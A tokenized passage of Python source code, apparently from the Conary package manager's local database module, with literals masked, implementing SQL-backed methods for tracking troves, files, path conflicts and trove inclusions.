_sanitizeTroveCollection ( self , cu , instanceId , nameHint = None ) : <EOL> if nameHint : <EOL> nameClause = "<STR_LIT>" % nameHint <EOL> else : <EOL> nameClause = "<STR_LIT>" <EOL> cu . execute ( """<STR_LIT>""" % nameClause , instanceId ) <EOL> pristineTrv = trove . Trove ( '<STR_LIT:foo>' , versions . NewVersion ( ) , <EOL> deps . deps . Flavor ( ) , None ) <EOL> currentTrv = trove . Trove ( '<STR_LIT:foo>' , versions . NewVersion ( ) , <EOL> deps . deps . Flavor ( ) , None ) <EOL> instanceDict = { } <EOL> origIncluded = set ( ) <EOL> versionCache = VersionCache ( ) <EOL> flavorCache = FlavorCache ( ) <EOL> for ( includedId , name , version , flavor , isPresent , <EOL> inPristine , timeStamps ) in cu : <EOL> flavor = flavorCache . get ( flavor ) <EOL> version = versionCache . get ( version , timeStamps ) <EOL> instanceDict [ ( name , version , flavor ) ] = includedId <EOL> origIncluded . add ( ( name , version , flavor ) ) <EOL> if isPresent : <EOL> currentTrv . addTrove ( name , version , flavor ) <EOL> if inPristine : <EOL> pristineTrv . 
addTrove ( name , version , flavor ) <EOL> linkByName = { } <EOL> trvChanges = currentTrv . diff ( pristineTrv ) [ <NUM_LIT:2> ] <EOL> for ( name , ( oldVersion , oldFlavor ) , ( newVersion , newFlavor ) , isAbs ) in trvChanges : <EOL> if oldVersion is None : <EOL> badInstanceId = instanceDict [ ( name , newVersion , newFlavor ) ] <EOL> cu . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" , instanceId , badInstanceId ) <EOL> origIncluded . discard ( ( name , newVersion , newFlavor ) ) <EOL> elif newVersion is None : <EOL> linkByName . setdefault ( name , set ( ) ) . add ( oldVersion . branch ( ) ) <EOL> if not linkByName : return <EOL> for ( name , version , flavor ) in self . findByNames ( linkByName ) : <EOL> if version . branch ( ) in linkByName [ name ] : <EOL> currentTrv . addTrove ( name , version , flavor , presentOkay = True ) <EOL> trvChanges = currentTrv . diff ( pristineTrv ) [ <NUM_LIT:2> ] <EOL> for ( name , ( oldVersion , oldFlavor ) , ( newVersion , newFlavor ) , isAbs ) in trvChanges : <EOL> if newVersion is None : continue <EOL> if ( name , newVersion , newFlavor ) in origIncluded : continue <EOL> if ( name , oldVersion , oldFlavor ) not in instanceDict : continue <EOL> oldIncludedId = instanceDict [ name , oldVersion , oldFlavor ] <EOL> flags = cu . execute ( """<STR_LIT>""" , <EOL> instanceId , oldIncludedId ) . next ( ) [ <NUM_LIT:0> ] <EOL> if newFlavor . isEmpty ( ) : <EOL> flavorStr = "<STR_LIT>" <EOL> else : <EOL> flavorStr = "<STR_LIT>" % newFlavor . freeze ( ) <EOL> cu . execute ( """<STR_LIT>""" % flavorStr , instanceId , flags , name , <EOL> newVersion . asString ( ) ) <EOL> def addFile ( self , troveInfo , pathId , path , fileId , fileVersion , <EOL> fileStream = None , isPresent = True ) : <EOL> ( cu , troveInstanceId , addFileStmt , oldInstanceId ) = troveInfo <EOL> versionId = self . getVersionId ( fileVersion , self . addVersionCache ) <EOL> if fileStream : <EOL> cu . 
execstmt ( addFileStmt , pathId , versionId , path , fileId , <EOL> fileStream , isPresent ) <EOL> tags = files . frozenFileTags ( fileStream ) <EOL> if tags : <EOL> cu . executemany ( "<STR_LIT>" , <EOL> itertools . izip ( itertools . repeat ( pathId ) , tags ) ) <EOL> else : <EOL> cu . execute ( """<STR_LIT>""" , <EOL> troveInstanceId , isPresent , path , versionId , <EOL> pathId , oldInstanceId ) <EOL> def addTroveDone ( self , troveInfo ) : <EOL> ( cu , troveInstanceId , addFileStmt , oldInstanceId ) = troveInfo <EOL> cu . execute ( """<STR_LIT>""" <EOL> % troveInstanceId ) <EOL> cu . execute ( """<STR_LIT>""" ) <EOL> cu . execute ( """<STR_LIT>""" , troveInstanceId ) <EOL> cu . execute ( "<STR_LIT>" ) <EOL> cu . execute ( "<STR_LIT>" ) <EOL> return troveInstanceId <EOL> def markUserReplacedFiles ( self , userReplaced ) : <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( """<STR_LIT>""" ) <EOL> for ( name , version , flavor ) , fileList in userReplaced . iteritems ( ) : <EOL> for pathId , content , fileObj in fileList : <EOL> flavorStr = flavor . freeze ( ) <EOL> if not flavorStr : <EOL> flavorStr = None <EOL> cu . execute ( """<STR_LIT>""" , name , version . asString ( ) , flavorStr , pathId ) <EOL> cu . execute ( """<STR_LIT>""" ) <EOL> cu . execute ( "<STR_LIT>" ) <EOL> def checkPathConflicts ( self , instanceIdList , replaceCheck , sharedFiles ) : <EOL> cu = self . db . cursor ( ) <EOL> cu2 = self . db . cursor ( ) <EOL> cu . execute ( "<STR_LIT>" ) <EOL> for instanceId in instanceIdList : <EOL> cu . execute ( "<STR_LIT>" , <EOL> instanceId ) <EOL> cu . execute ( """<STR_LIT>""" ) <EOL> conflicts = [ ] <EOL> replaced = { } <EOL> for ( path , existingInstanceId , existingPathId , existingStream , <EOL> existingTroveName , existingVersion , existingFlavor , <EOL> addedInstanceId , addedPathId , addedStream , addedTroveName , <EOL> addedVersion , addedFlavor ) in cu : <EOL> if existingPathId in sharedFiles . 
get ( <EOL> ( existingTroveName , <EOL> versions . VersionFromString ( existingVersion ) , <EOL> deps . deps . ThawDependencySet ( existingFlavor ) ) , set ( ) ) : <EOL> continue <EOL> replaceExisting = False <EOL> addedFile = files . ThawFile ( addedStream , addedPathId ) <EOL> existingFile = files . ThawFile ( existingStream , existingPathId ) <EOL> if addedFile . compatibleWith ( existingFile ) : <EOL> continue <EOL> if ( addedFile . flags . isEncapsulatedContent ( ) and <EOL> existingFile . flags . isEncapsulatedContent ( ) ) : <EOL> cmp = files . rpmFileColorCmp ( addedFile , existingFile ) <EOL> if cmp == <NUM_LIT:1> : <EOL> replaceExisting = True <EOL> elif cmp == - <NUM_LIT:1> : <EOL> continue <EOL> if path . startswith ( '<STR_LIT>' ) : <EOL> continue <EOL> if replaceCheck ( path ) : <EOL> replaceExisting = True <EOL> if replaceExisting : <EOL> cu2 . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> existingInstanceId , existingPathId ) <EOL> existingTroveInfo = ( existingTroveName , <EOL> versions . VersionFromString ( existingVersion ) , <EOL> deps . deps . ThawFlavor ( existingFlavor ) ) <EOL> l = replaced . setdefault ( existingTroveInfo , [ ] ) <EOL> l . append ( ( existingPathId , None , None ) ) <EOL> else : <EOL> conflicts . append ( ( path , <EOL> ( existingPathId , <EOL> ( existingTroveName , <EOL> versions . VersionFromString ( existingVersion ) , <EOL> deps . deps . ThawFlavor ( existingFlavor ) ) ) , <EOL> ( addedPathId , <EOL> ( addedTroveName , <EOL> versions . VersionFromString ( addedVersion ) , <EOL> deps . deps . ThawFlavor ( addedFlavor ) ) ) ) ) <EOL> cu . execute ( "<STR_LIT>" ) <EOL> if conflicts : <EOL> raise errors . DatabasePathConflicts ( conflicts ) <EOL> return replaced <EOL> def getFile ( self , pathId , fileId , pristine = False ) : <EOL> stream = self . troveFiles . getFileByFileId ( fileId , <EOL> justPresent = not pristine ) [ <NUM_LIT:1> ] <EOL> return files . 
ThawFile ( stream , pathId ) <EOL> def getFileStream ( self , fileId , pristine = False ) : <EOL> return self . troveFiles . getFileByFileId ( fileId , <EOL> justPresent = not pristine ) [ <NUM_LIT:1> ] <EOL> def findFileVersion ( self , fileId ) : <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( """<STR_LIT>""" , fileId ) <EOL> for ( stream , ) in cu : <EOL> return files . ThawFile ( stream , None ) <EOL> return None <EOL> def iterFiles ( self , l ) : <EOL> cu = self . db . cursor ( ) <EOL> schema . resetTable ( cu , '<STR_LIT>' ) <EOL> cu . executemany ( '<STR_LIT>' , <EOL> ( ( x [ <NUM_LIT:0> ] , x [ <NUM_LIT:1> ] [ <NUM_LIT:1> ] ) for x in enumerate ( l ) ) , <EOL> start_transaction = False ) <EOL> cu . execute ( """<STR_LIT>""" ) <EOL> l2 = [ None ] * len ( l ) <EOL> for ( row , stream ) in cu : <EOL> fObj = files . ThawFile ( stream , l [ row ] [ <NUM_LIT:0> ] ) <EOL> assert ( l [ row ] [ <NUM_LIT:1> ] == fObj . fileId ( ) ) <EOL> l2 [ row ] = fObj <EOL> return l2 <EOL> def hasTroves ( self , troveList ) : <EOL> instances = self . _lookupTroves ( troveList ) <EOL> result = [ False ] * len ( troveList ) <EOL> for i , instanceId in enumerate ( instances ) : <EOL> if instanceId is not None : <EOL> result [ i ] = True <EOL> return result <EOL> def getTroves ( self , troveList , pristine = True , withFiles = True , <EOL> withDeps = True , withFileObjects = False ) : <EOL> instances = self . _lookupTroves ( troveList ) <EOL> toFind = { } <EOL> for i , instanceId in enumerate ( instances ) : <EOL> if instanceId is not None : <EOL> toFind . setdefault ( instanceId , [ ] ) . append ( i ) <EOL> results = [ None for x in instances ] <EOL> instances = list ( self . _iterTroves ( pristine , <EOL> instanceIds = toFind , <EOL> withFiles = withFiles , <EOL> withDeps = withDeps , <EOL> withFileObjects = withFileObjects ) ) <EOL> for instanceId , instance in itertools . 
izip ( toFind , instances ) : <EOL> for slot in toFind [ instanceId ] : <EOL> results [ slot ] = instance <EOL> return results <EOL> def getTroveFiles ( self , troveList , onlyDirectories = False ) : <EOL> instanceIds = self . _lookupTroves ( troveList ) <EOL> if None in instanceIds : <EOL> raise KeyError <EOL> trvByInstanceId = dict ( [ ( instId , trvInfo ) for <EOL> instId , trvInfo in itertools . izip ( instanceIds , troveList ) <EOL> if instId is not None ] ) <EOL> instanceIds = trvByInstanceId . keys ( ) <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( """<STR_LIT>""" % self . db . keywords , start_transaction = False ) <EOL> cu . executemany ( "<STR_LIT>" , <EOL> list ( enumerate ( instanceIds ) ) , start_transaction = False ) <EOL> if onlyDirectories : <EOL> dirClause = "<STR_LIT>" <EOL> else : <EOL> dirClause = "<STR_LIT>" <EOL> cu . execute ( """<STR_LIT>""" % dirClause ) <EOL> lastId = None <EOL> for instanceId , path , stream in cu : <EOL> yield trvByInstanceId [ instanceId ] , path , stream <EOL> cu . execute ( "<STR_LIT>" , start_transaction = False ) <EOL> def _lookupTroves ( self , troveList ) : <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( """<STR_LIT>""" % self . db . keywords , start_transaction = False ) <EOL> def _iter ( tl ) : <EOL> for i , ( name , version , flavor ) in enumerate ( tl ) : <EOL> yield ( i , name , str ( version ) , flavor . freeze ( ) ) <EOL> cu . executemany ( "<STR_LIT>" , <EOL> _iter ( troveList ) , <EOL> start_transaction = False ) <EOL> cu . execute ( """<STR_LIT>""" ) <EOL> r = [ None ] * len ( troveList ) <EOL> for ( idx , instanceId ) in cu : <EOL> r [ idx ] = instanceId <EOL> cu . 
execute ( "<STR_LIT>" , start_transaction = False ) <EOL> return r <EOL> def _iterTroves ( self , pristine , instanceIds , withFiles = True , <EOL> withDeps = True , errorOnMissing = True , <EOL> withFileObjects = False ) : <EOL> """<STR_LIT>""" <EOL> instanceIds = list ( instanceIds ) <EOL> if withFileObjects : <EOL> troveClass = trove . TroveWithFileObjects <EOL> else : <EOL> troveClass = trove . Trove <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( """<STR_LIT>""" % self . db . keywords , start_transaction = False ) <EOL> cu . executemany ( "<STR_LIT>" , <EOL> list ( enumerate ( instanceIds ) ) , start_transaction = False ) <EOL> cu . execute ( """<STR_LIT>""" ) <EOL> versionCache = VersionCache ( ) <EOL> flavorCache = FlavorCache ( ) <EOL> results = [ None for x in instanceIds ] <EOL> for idx , troveName , versionStr , flavorStr , timeStamps in cu : <EOL> troveFlavor = flavorCache . get ( flavorStr ) <EOL> troveVersion = versionCache . get ( versionStr , timeStamps ) <EOL> trv = troveClass ( troveName , troveVersion , troveFlavor , None , <EOL> setVersion = False ) <EOL> results [ idx ] = trv <EOL> cu = self . db . cursor ( ) <EOL> if pristine : <EOL> pristineClause = "<STR_LIT>" <EOL> else : <EOL> pristineClause = "<STR_LIT>" <EOL> cu . execute ( """<STR_LIT>""" % pristineClause ) <EOL> for idx , name , versionStr , flags , timeStamps , flavorStr in cu : <EOL> version = versionCache . get ( versionStr , timeStamps ) <EOL> flavor = flavorCache . get ( flavorStr ) <EOL> byDefault = ( flags & schema . TROVE_TROVES_BYDEFAULT ) != <NUM_LIT:0> <EOL> weakRef = ( flags & schema . TROVE_TROVES_WEAKREF ) != <NUM_LIT:0> <EOL> results [ idx ] . addTrove ( name , version , flavor , byDefault = byDefault , <EOL> weakRef = weakRef ) <EOL> for idx , instanceId in enumerate ( instanceIds ) : <EOL> trv = results [ idx ] <EOL> if withDeps : <EOL> self . depTables . get ( cu , trv , instanceId ) <EOL> self . troveInfoTable . 
getInfo ( cu , trv , instanceId ) <EOL> if not withFiles : <EOL> yield trv <EOL> if not pristine or withFiles : <EOL> if withFileObjects : <EOL> streamStr = "<STR_LIT>" <EOL> else : <EOL> streamStr = "<STR_LIT>" <EOL> cu . execute ( """<STR_LIT>""" % streamStr ) <EOL> curIdx = <NUM_LIT:0> <EOL> for ( idx , pathId , path , version , fileId , isPresent , stream ) in cu : <EOL> if not pristine and not isPresent : <EOL> continue <EOL> version = versions . VersionFromString ( version ) <EOL> results [ idx ] . addFile ( pathId , path , version , fileId ) <EOL> if stream : <EOL> results [ idx ] . addFileObject ( fileId , <EOL> files . ThawFile ( stream , pathId ) ) <EOL> while idx != curIdx : <EOL> yield results [ curIdx ] <EOL> curIdx += <NUM_LIT:1> <EOL> while curIdx < len ( results ) : <EOL> if not pristine : <EOL> results [ idx ] . computePathHashes ( ) <EOL> if not withFiles : <EOL> results [ idx ] . removeAllFiles ( ) <EOL> yield results [ curIdx ] <EOL> curIdx += <NUM_LIT:1> <EOL> cu . execute ( "<STR_LIT>" , start_transaction = False ) <EOL> def eraseTrove ( self , troveName , troveVersion , troveFlavor ) : <EOL> cu = self . db . cursor ( ) <EOL> if not self . needsCleanup : <EOL> self . needsCleanup = True <EOL> cu . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" % self . db . keywords ) <EOL> troveVersionId = self . versionTable [ troveVersion ] <EOL> if troveFlavor is None : <EOL> troveFlavorId = <NUM_LIT:0> <EOL> else : <EOL> troveFlavorId = self . flavors [ troveFlavor ] <EOL> troveInstanceId = self . instances [ ( troveName , troveVersionId , <EOL> troveFlavorId ) ] <EOL> cu . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" , troveVersionId ) <EOL> cu . execute ( """<STR_LIT>""" , troveInstanceId ) <EOL> cu . execute ( """<STR_LIT>""" , troveInstanceId ) <EOL> wasIn = [ x for x in cu . execute ( "<STR_LIT>" , troveName ) ] <EOL> self . troveFiles . delInstance ( troveInstanceId ) <EOL> cu . execute ( "<STR_LIT>" , <EOL> troveInstanceId ) <EOL> cu . 
# --- continuation of eraseTrove: final bookkeeping for the erased instance.
execute("<STR_LIT>"
        "<STR_LIT>", troveInstanceId)
    self.depTables.delete(self.db.cursor(), troveInstanceId)
    self.instances.setPresent(troveInstanceId, <NUM_LIT:0>, False)
    # Collections that used to contain this trove may now need fixing up.
    for x, in wasIn:
        self._sanitizeTroveCollection(cu, x, nameHint=troveName)

def commit(self):
    # Flush any pending erase-cleanup work, commit, and reset the
    # per-transaction caches.
    if self.needsCleanup:
        cu = self.db.cursor()
        cu.execute("""<STR_LIT>""")
        cu.execute("""<STR_LIT>""")
        cu.execute("""<STR_LIT>""")
        cu.execute("<STR_LIT>")
        self.needsCleanup = False
    self.db.commit()
    self.addVersionCache = {}
    self.flavorsNeeded = {}

def dependencyChecker(self, troveSource, findOrdering=True,
                      ignoreDepClasses=set()):
    # Factory for a DependencyChecker bound to this database.
    # NOTE(review): ignoreDepClasses is a mutable default argument; safe
    # only while neither this code nor DependencyChecker mutates it --
    # confirm before relying on it.
    return deptable.DependencyChecker(self.db, troveSource,
                                      findOrdering=findOrdering,
                                      ignoreDepClasses=ignoreDepClasses)

def pathIsOwned(self, path):
    # True if any currently-present trove owns the given path.
    for instanceId in self.troveFiles.iterPath(path):
        if self.instances.idIsPresent(instanceId):
            return True
    return False

def iterFindByPath(self, path, pristine=False):
    # Iterate the troves owning path (delegates to _iterTroves).
    return self._iterTroves(instanceIds=self.troveFiles.iterPath(path),
                            pristine=pristine)

def pathsOwned(self, pathList):
    # Bulk ownership test: returns one bool per input path, in order.
    if not pathList:
        return []
    cu = self.db.cursor()
    cu.execute("""<STR_LIT>""" % self.db.keywords, start_transaction=False)
    self.db.bulkload("<STR_LIT>", [(x,) for x in pathList], ["<STR_LIT:path>"],
                     start_transaction=False)
    cu.execute("""<STR_LIT>""")
    pathsFound = set(x[<NUM_LIT:0>] for x in cu)
    # (statement continues on the next line)
    cu.
# --- continuation of pathsOwned: drop the temp table, then answer per path.
execute("<STR_LIT>", start_transaction=False)
    return [path in pathsFound for path in pathList]

def iterFindPathReferences(self, path, justPresent=False,
                           withStream=False):
    # Yield (name, version, flavor, pathId, fileId[, stream]) for every
    # trove file row referencing path.
    if withStream:
        stream = "<STR_LIT>"
    else:
        stream = "<STR_LIT>"
    cu = self.db.cursor()
    cu.execute("""<STR_LIT>""" % stream, path)
    # NOTE(review): the loop variable `stream` below shadows the SQL
    # fragment chosen above; harmless here, but confusing to readers.
    for (name, version, flavor, pathId, fileId, isPresent, stream) in cu:
        if not isPresent and justPresent:
            continue
        version = versions.VersionFromString(version)
        if flavor is None:
            flavor = deps.deps.Flavor()
        else:
            flavor = deps.deps.ThawFlavor(flavor)
        if stream:
            yield (name, version, flavor, pathId, fileId, stream)
        else:
            yield (name, version, flavor, pathId, fileId)

def removeFileFromTrove(self, trove, path):
    # Drop a single path from an installed trove's file list.
    versionId = self.versionTable[trove.getVersion()]
    flavorId = self.flavors[trove.getFlavor()]
    instanceId = self.instances[(trove.getName(), versionId, flavorId)]
    self.troveFiles.removePath(instanceId, path)

def removePathIdsFromTrove(self, troveName, troveVersion, troveFlavor,
                           pathIdList):
    # Drop a set of pathIds from an installed trove's file list.
    versionId = self.versionTable[troveVersion]
    flavorId = self.flavors[troveFlavor]
    instanceId = self.instances[(troveName, versionId, flavorId)]
    self.troveFiles.removePathIds(instanceId, pathIdList)

def restorePathIdsToTrove(self, troveName, troveVersion, troveFlavor,
                          pathIdList):
    # Inverse of removePathIdsFromTrove (continues on the next line).
    versionId = self.versionTable[troveVersion]
    flavorId = self.flavors[troveFlavor]
    instanceId = self.instances[(troveName, versionId, flavorId)]
    self.troveFiles.
restorePathIds ( instanceId , pathIdList ) <EOL> def iterFilesInTrove ( self , troveName , version , flavor , <EOL> sortByPath = False , withFiles = False , <EOL> pristine = False ) : <EOL> if sortByPath : <EOL> sort = "<STR_LIT>" <EOL> else : <EOL> sort = "<STR_LIT>" <EOL> cu = self . db . cursor ( ) <EOL> troveVersionId = self . versionTable [ version ] <EOL> if flavor . isEmpty ( ) : <EOL> troveFlavorId = <NUM_LIT:0> <EOL> else : <EOL> troveFlavorId = self . flavors [ flavor ] <EOL> troveInstanceId = self . instances [ ( troveName , troveVersionId , <EOL> troveFlavorId ) ] <EOL> versionCache = { } <EOL> if pristine : <EOL> cu . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT:%s>" % sort , troveInstanceId ) <EOL> else : <EOL> cu . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % sort , troveInstanceId ) <EOL> versionCache = { } <EOL> for ( pathId , path , fileId , versionId , stream ) in cu : <EOL> version = versionCache . get ( versionId , None ) <EOL> if not version : <EOL> version = self . versionTable . getBareId ( versionId ) <EOL> versionCache [ versionId ] = version <EOL> if withFiles : <EOL> fileObj = files . ThawFile ( stream , pathId ) <EOL> yield ( pathId , path , fileId , version , fileObj ) <EOL> else : <EOL> yield ( pathId , path , fileId , version ) <EOL> def mapPinnedTroves ( self , mapList ) : <EOL> if not mapList : <EOL> return <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( """<STR_LIT>""" % self . db . keywords ) <EOL> def _iter ( ml ) : <EOL> for ( name , pinnedInfo , mapInfo ) in ml : <EOL> assert ( sum ( mapInfo [ <NUM_LIT:0> ] . timeStamps ( ) ) > <NUM_LIT:0> ) <EOL> if pinnedInfo [ <NUM_LIT:1> ] is None or pinnedInfo [ <NUM_LIT:1> ] . isEmpty ( ) : <EOL> pinnedFlavor = None <EOL> else : <EOL> pinnedFlavor = pinnedInfo [ <NUM_LIT:1> ] . freeze ( ) <EOL> if mapInfo [ <NUM_LIT:1> ] is None or mapInfo [ <NUM_LIT:1> ] . isEmpty ( ) : <EOL> mapFlavor = None <EOL> else : <EOL> mapFlavor = mapInfo [ <NUM_LIT:1> ] . 
# --- continuation of mapPinnedTroves._iter and the surrounding method.
freeze()
            yield (name, pinnedInfo[<NUM_LIT:0>].asString(), pinnedFlavor,
                   mapInfo[<NUM_LIT:0>].asString(),
                   "<STR_LIT::>".join(["<STR_LIT>" % x for x in mapInfo[<NUM_LIT:0>].timeStamps()]),
                   mapFlavor)
    cu.executemany("<STR_LIT>",
                   _iter(mapList))
    cu.execute("""<STR_LIT>""")
    cu.execute("<STR_LIT>")

def getTroveContainers(self, l):
    """<STR_LIT>"""
    # Container lookup: who includes each trove in l?
    return self._getTroveInclusions(l, False, weakRefs=False,
                                    pristineOnly=False)

def getTroveTroves(self, l, weakRefs=False, justPresent=False,
                   pristineOnly=True):
    """<STR_LIT>"""
    # Child lookup: what does each trove in l include?
    return self._getTroveInclusions(l, True, weakRefs=weakRefs,
                                    justPresent=justPresent,
                                    pristineOnly=pristineOnly)

def _getTroveInclusions(self, l, included, weakRefs=False,
                        justPresent=False, pristineOnly=True):
    # Shared engine for the two methods above; `included` flips the join
    # direction (children vs. containers).
    cu = self.db.cursor()
    cu.execute("""<STR_LIT>""" % self.db.keywords, start_transaction=False)
    result = []
    def _iter(infoList, resultList):
        # Appends one result slot per query row as a side effect of
        # feeding executemany.
        for idx, info in enumerate(infoList):
            resultList.append([])
            yield (idx, info[<NUM_LIT:0>], info[<NUM_LIT:1>].asString(), info[<NUM_LIT:2>].freeze())
    cu.executemany("<STR_LIT>",
                   _iter(l, result), start_transaction=False)
    # Assemble the SQL filters from the keyword options.
    if included:
        sense = ("<STR_LIT>", "<STR_LIT>")
    else:
        sense = ("<STR_LIT>", "<STR_LIT>")
    if justPresent:
        presentFilter = "<STR_LIT>"
    else:
        presentFilter = "<STR_LIT>"
    if pristineOnly:
        pristineFilter = "<STR_LIT>"
    else:
        pristineFilter = "<STR_LIT>"
    if weakRefs:
        weakRefsFilter = <NUM_LIT:0>
    else:
        # (statement continues on the next line)
        weakRefsFilter = schema.
# --- continuation of _getTroveInclusions: run the assembled query.
TROVE_TROVES_WEAKREF
    sql = """<STR_LIT>""" % (sense + (presentFilter, pristineFilter,
                                      weakRefsFilter))
    cu.execute(sql)
    for (idx, name, version, flavor, ts, flags) in cu:
        # Timestamps travel as a separator-joined string; decode to floats.
        ts = [float(x) for x in ts.split("<STR_LIT::>")]
        result[idx].append((name,
                            versions.VersionFromString(version,
                                                       timeStamps=ts),
                            deps.deps.ThawFlavor(flavor)))
    cu.execute("<STR_LIT>", start_transaction=False)
    return result

def findTroveContainers(self, names):
    # For each name, list the (name, version, flavor) of containing troves.
    cu = self.db.cursor()
    cu.execute("""<STR_LIT>""" % self.db.keywords, start_transaction=False)
    cu.executemany("<STR_LIT>", enumerate(names),
                   start_transaction=False)
    cu.execute("""<STR_LIT>""")
    result = [[] for x in names]
    for (idx, name, version, flavor) in cu:
        result[idx].append((name, versions.VersionFromString(version),
                            deps.deps.ThawFlavor(flavor)))
    cu.execute("<STR_LIT>", start_transaction=False)
    return result

def findTroveReferences(self, names):
    """<STR_LIT>"""
    # Same shape as findTroveContainers but runs a different query; keep
    # the two in sync when changing either.
    cu = self.db.cursor()
    cu.execute("""<STR_LIT>""" % self.db.keywords, start_transaction=False)
    cu.executemany("<STR_LIT>",
                   enumerate(names), start_transaction=False)
    cu.execute("""<STR_LIT>""")
    result = [[] for x in names]
    for (idx, name, version, flavor) in cu:
        result[idx].append((name, versions.VersionFromString(version),
                            deps.deps.ThawFlavor(flavor)))
    cu.execute("<STR_LIT>", start_transaction=False)
    return result

def findUnreferencedTroves(self):
    # Troves in the DB that nothing references (continues on next line).
    cu = self.db.cursor()
    cu.execute("""<STR_LIT>""")
    l = []
    for (name, version, flavorStr) in cu:
        if flavorStr is None:
            flavorStr = deps.
# --- continuation of findUnreferencedTroves.
deps.Flavor()
        else:
            flavorStr = deps.deps.ThawFlavor(flavorStr)
        l.append((name, versions.VersionFromString(version), flavorStr))
    return l

def iterUpdateContainerInfo(self, troveNames=None):
    """<STR_LIT>"""
    # Yields ((name, version, flavor), parentInfo, isPresent, weakRef) for
    # every trove, optionally restricted to troveNames.
    cu = self.db.cursor()
    if troveNames:
        # Narrow the query through a temp table of the requested names.
        cu.execute("<STR_LIT>",
                   start_transaction=False)
        cu.executemany(
            """<STR_LIT>""", troveNames, start_transaction=False)
        cu.execute('''<STR_LIT>''', start_transaction=False)
        fromClause = '<STR_LIT>'
    else:
        fromClause = '<STR_LIT>'
    cu.execute("""<STR_LIT>""" % fromClause)
    versionCache = VersionCache()
    flavorCache = FlavorCache()
    for (isPresent, name, versionStr, timeStamps, flavorStr,
         parentName, parentVersionStr, parentTimeStamps, parentFlavor,
         flags) in cu:
        if parentName:
            # weakRef carries the raw bit value here (truthy/falsy), not
            # a normalized bool.
            weakRef = flags & schema.TROVE_TROVES_WEAKREF
            v = versionCache.get(parentVersionStr, parentTimeStamps)
            f = flavorCache.get(parentFlavor)
            parentInfo = (parentName, v, f)
        else:
            weakRef = False
            parentInfo = None
        version = versionCache.get(versionStr, timeStamps)
        flavor = flavorCache.get(flavorStr)
        yield ((name, version, flavor), parentInfo, isPresent, weakRef)
    if troveNames:
        cu.execute("<STR_LIT>", start_transaction=False)

def getAllTroveInfo(self, troveInfoTag):
    # All (TroveTuple, data) pairs carrying the given troveinfo tag.
    cu = self.db.cursor()
    cu.execute("""<STR_LIT>""", troveInfoTag)
    versionCache = VersionCache()
    flavorCache = FlavorCache()
    # (expression continues on the next line)
    return [(
        TroveTuple(name=x[<NUM_LIT:0>],
                   version=versionCache.get(x[<NUM_LIT:1>], x[<NUM_LIT:2>]),
                   flavor=flavorCache.
get ( x [ <NUM_LIT:3> ] ) ) , <EOL> x [ <NUM_LIT:4> ] ) for x in cu ] <EOL> def _getTroveInfo ( self , troveList , troveInfoTag ) : <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( """<STR_LIT>""" % self . db . keywords , start_transaction = False ) <EOL> r = [ ] <EOL> def _iter ( tl , r ) : <EOL> for i , ( name , version , flavor ) in enumerate ( tl ) : <EOL> flavorId = self . flavors . get ( flavor , None ) <EOL> if flavorId is None : <EOL> continue <EOL> versionId = self . versionTable . get ( version , None ) <EOL> if versionId is None : <EOL> continue <EOL> r . append ( None ) <EOL> yield ( i , name , versionId , flavorId ) <EOL> cu . executemany ( "<STR_LIT>" , <EOL> _iter ( troveList , r ) , start_transaction = False ) <EOL> cu . execute ( """<STR_LIT>""" , troveInfoTag ) <EOL> for ( idx , data ) in cu : <EOL> r [ idx ] = trove . TroveInfo . streamDict [ troveInfoTag ] [ <NUM_LIT:1> ] ( data ) <EOL> cu . execute ( "<STR_LIT>" , start_transaction = False ) <EOL> return r <EOL> def getPathHashesForTroveList ( self , troveList ) : <EOL> """<STR_LIT>""" <EOL> return self . _getTroveInfo ( troveList , trove . _TROVEINFO_TAG_PATH_HASHES ) <EOL> def getCapsulesTroveList ( self , troveList ) : <EOL> """<STR_LIT>""" <EOL> return self . _getTroveInfo ( troveList , trove . _TROVEINFO_TAG_CAPSULE ) <EOL> def getTroveScripts ( self , troveList ) : <EOL> """<STR_LIT>""" <EOL> return self . _getTroveInfo ( troveList , trove . _TROVEINFO_TAG_SCRIPTS ) <EOL> def getTroveCompatibilityClass ( self , name , version , flavor ) : <EOL> if flavor is None or flavor . isEmpty ( ) : <EOL> flavorClause = "<STR_LIT>" <EOL> else : <EOL> flavorClause = "<STR_LIT>" % flavor . freeze ( ) <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( """<STR_LIT>""" % flavorClause , trove . _TROVEINFO_TAG_COMPAT_CLASS , <EOL> name , str ( version ) ) <EOL> l = cu . 
# --- continuation of getTroveCompatibilityClass.
fetchall()
    if not l:
        raise KeyError
    elif l[<NUM_LIT:0>][<NUM_LIT:0>] is None:
        # Row exists but no compatibility class was recorded.
        return <NUM_LIT:0>
    return streams.ShortStream(l[<NUM_LIT:0>][<NUM_LIT:0>])()

def findRemovedByName(self, name):
    """<STR_LIT>"""
    cu = self.db.cursor()
    cu.execute("""<STR_LIT>""", name)
    return [(n, versions.VersionFromString(v),
             deps.deps.ThawFlavor(f)) for (n, v, f) in cu]

def findByNames(self, nameList):
    # All (name, version, flavor) tuples recorded for the given names.
    cu = self.db.cursor()
    cu.execute("""<STR_LIT>""" %
               "<STR_LIT:U+002C>".join(["<STR_LIT>" % x for x in nameList]))
    versionCache = VersionCache()
    flavorCache = FlavorCache()
    l = []
    for (name, version, flavor, timeStamps) in cu:
        version = versionCache.get(version, timeStamps)
        flavor = flavorCache.get(flavor)
        l.append((name, version, flavor))
    return l

def troveIsIncomplete(self, name, version, flavor):
    # True when the stored troveinfo marks this trove incomplete.
    cu = self.db.cursor()
    if isinstance(flavor, deps.deps.Flavor) and not flavor.isEmpty():
        flavorStr = '<STR_LIT>'
        flavorArgs = [flavor.freeze()]
    else:
        flavorStr = '<STR_LIT>'
        flavorArgs = []
    cu.execute("""<STR_LIT>""" % flavorStr,
               [trove._TROVEINFO_TAG_INCOMPLETE,
